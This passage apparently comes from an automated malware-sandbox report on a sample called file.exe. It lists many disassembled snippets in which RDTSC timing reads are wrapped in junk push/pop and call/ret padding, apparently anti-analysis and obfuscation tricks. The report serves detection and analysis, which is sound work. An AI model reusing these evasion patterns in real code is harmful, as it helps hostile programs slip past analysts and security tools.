              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28B99 second address: D28B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29A87 second address: D29A91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F15FCC2EA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29A91 second address: D29A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29A97 second address: D29A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29A9B second address: D29AA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29AA8 second address: D29B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F15FCC2EA68h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov di, D778h 0x00000027 push 00000000h 0x00000029 or edi, 651D0FB5h 0x0000002f pushad 0x00000030 jmp 00007F15FCC2EA72h 0x00000035 and eax, dword ptr [ebp+122D29CAh] 0x0000003b popad 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F15FCC2EA68h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D1D4Dh] 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jl 00007F15FCC2EA68h 0x00000067 push edi 0x00000068 pop edi 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B29 second address: D29B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B2F second address: D29B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AB1E second address: D2AB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AB22 second address: D2AB83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D1821h], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F15FCC2EA68h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F15FCC2EA68h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122DBA6Fh], edx 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AB83 second address: D2AB94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AB94 second address: D2ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F15FCC2EA6Bh 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22213 second address: D2225A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+1245EE55h], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 xor dword ptr [ebp+122D1AAFh], esi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 or ebx, dword ptr [ebp+122D1BCBh] 0x00000028 mov eax, dword ptr [ebp+122D0E41h] 0x0000002e mov dword ptr [ebp+12451C02h], ebx 0x00000034 push FFFFFFFFh 0x00000036 mov di, 5DCAh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jnc 00007F15FCD6BB56h 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2225A second address: D2225F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E86C second address: D2E876 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F15FCD6BB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323E8 second address: D323EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323EC second address: D323F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323F0 second address: D323FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323FB second address: D32402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32402 second address: D32412 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F15FCC2EA66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32412 second address: D32416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3269B second address: D3269F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3269F second address: D326A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D327E9 second address: D327ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D327ED second address: D327F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D327F1 second address: D3280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F15FCC2EA6Bh 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F15FCC2EA66h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3280E second address: D32812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32812 second address: D32818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32818 second address: D32828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007F15FCD6BB56h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32828 second address: D32846 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F15FCC2EA66h 0x00000008 jmp 00007F15FCC2EA71h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38522 second address: D38539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB61h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38539 second address: D38559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F15FCC2EA66h 0x0000000a jmp 00007F15FCC2EA76h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38559 second address: D3855D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3855D second address: D38598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA79h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F15FCC2EA78h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27C61 second address: D27C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39A6A second address: D39A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F15FCC2EA75h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edi 0x00000012 pushad 0x00000013 js 00007F15FCC2EA66h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39A95 second address: D39AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jne 00007F15FCD6BB68h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F15FCD6BB5Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE978 second address: CCE97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDCDA second address: CBDCEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15FCD6BB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDCEA second address: CBDCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDCF4 second address: CBDCF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40340 second address: D40345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40345 second address: D4034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4034B second address: D40375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F15FCC2EA76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40375 second address: D4037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4037C second address: D40389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F15FCC2EA66h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D413A4 second address: D413CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB66h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F15FCD6BB5Dh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D413CD second address: D413D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D413D2 second address: D413FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F15FCD6BB62h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007F15FCD6BB56h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44F8C second address: D44FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA71h 0x00000007 jmp 00007F15FCC2EA73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F15FCC2EA6Bh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12F7 second address: CC12FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12FD second address: CC1317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA74h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49690 second address: D49696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49696 second address: D496B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496B5 second address: D496F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F15FCD6BB5Fh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007F15FCD6BB5Dh 0x00000013 jmp 00007F15FCD6BB5Fh 0x00000018 pop ecx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496F1 second address: D49708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA70h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49708 second address: D4970E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49883 second address: D49891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F15FCC2EA66h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D499EA second address: D499F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49CE9 second address: D49CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49E8C second address: D49E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F15FCD6BB56h 0x0000000d jne 00007F15FCD6BB56h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49E9F second address: D49EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49FDA second address: D49FDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A2CA second address: D4A2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F15FCC2EA74h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A2EC second address: D4A2F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F15FCD6BB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A2F8 second address: D4A2FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5068F second address: D5069F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F15FCD6BB56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5069F second address: D506D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F15FCC2EA72h 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jne 00007F15FCC2EA66h 0x0000001b popad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D506D7 second address: D506EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jg 00007F15FCD6BB56h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D506EB second address: D506FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F15FCC2EA66h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F5CC second address: D4F5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jc 00007F15FCD6BB56h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F5D8 second address: D4F5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F5DC second address: D4F5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F154 second address: D4F18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F15FCC2EA66h 0x0000000a popad 0x0000000b push edx 0x0000000c jns 00007F15FCC2EA66h 0x00000012 pop edx 0x00000013 jno 00007F15FCC2EA7Fh 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FE09 second address: D4FE21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB63h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FE21 second address: D4FE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F15FCC2EA66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D550A5 second address: D550A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D550A9 second address: D550B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F15FCC2EA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53DD8 second address: D53DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F15FCD6BB5Eh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E101 second address: D0E107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E241 second address: D0E24B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F15FCD6BB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E24B second address: D0E26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F15FCC2EA77h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E358 second address: D0E379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F15FCD6BB56h 0x0000000e js 00007F15FCD6BB56h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F15FCD6BB58h 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E379 second address: D0E38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA71h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E7F7 second address: D0E819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 74972D85h 0x00000011 mov dword ptr [ebp+122D1E44h], ebx 0x00000017 push FD6056CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E819 second address: D0E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E81D second address: D0E836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E8AD second address: D0E8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E8B1 second address: D0E8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E8B7 second address: D0E8D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F15FCC2EA71h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
